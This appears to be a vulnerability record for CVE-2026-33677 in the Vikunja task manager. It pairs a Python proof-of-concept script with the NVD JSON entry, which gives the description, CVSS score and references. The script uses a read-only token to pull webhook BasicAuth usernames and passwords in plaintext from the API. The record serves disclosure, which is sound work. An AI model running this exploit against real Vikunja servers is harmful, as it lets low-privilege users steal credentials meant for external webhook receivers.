CVE-2026-33677

import requests # Target API endpoint for a specific project # Replace PROJECT_ID with the actual target project ID target_url = "https://<vikunja-domain>/api/v1/projects/PROJECT_ID/webhooks" # Headers with authentication (JWT Token or Session Token) # The attacker only needs 'read' access to the project headers = { "Authorization": "Bearer <READ_ACCESS_TOKEN>", "Content-Type": "application/json" } try: # Send GET request to fetch webhooks response = requests.get(target_url, headers=headers) if response.status_code == 200: webhooks_data = response.json() # Iterate through webhooks to find sensitive credentials # Vulnerability: basic_auth_user and basic_auth_password are exposed if isinstance(webhooks_data, list): for webhook in webhooks_data: print(f"[+] Webhook ID: {webhook.get('id')}") print(f" Basic Auth User: {webhook.get('basic_auth_user')}") print(f" Basic Auth Password: {webhook.get('basic_auth_password')}") else: print("[-] Unexpected response format") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33677", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:35.113", "lastModified": "2026-03-27T16:29:43.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the `GET /api/v1/projects/:project/webhooks` endpoint returns webhook BasicAuth credentials (`basic_auth_user` and `basic_auth_password`) in plaintext to any user with read access to the project. While the existing code correctly masks the HMAC `secret` field, the BasicAuth fields added in a later migration were not given the same treatment. This allows read-only collaborators to steal credentials intended for authenticating against external webhook receivers. Version 2.2.1 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto autoalojada. Antes de la versión 2.2.1, el endpoint 'GET /API/v1/projects/:project/webhooks' devuelve las credenciales BasicAuth del webhook ('basic_auth_user' y 'basic_auth_password') en texto plano a cualquier usuario con acceso de lectura al proyecto. Si bien el código existente enmascara correctamente el campo 'secret' de HMAC, los campos BasicAuth añadidos en una migración posterior no recibieron el mismo tratamiento. Esto permite a los colaboradores de solo lectura robar credenciales destinadas a la autenticación contra receptores de webhook externos. La versión 2.2.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "E8647862-9C78-473D-9FED-7AFC24335A61"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-7c2g-p23p-4jg3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}]}}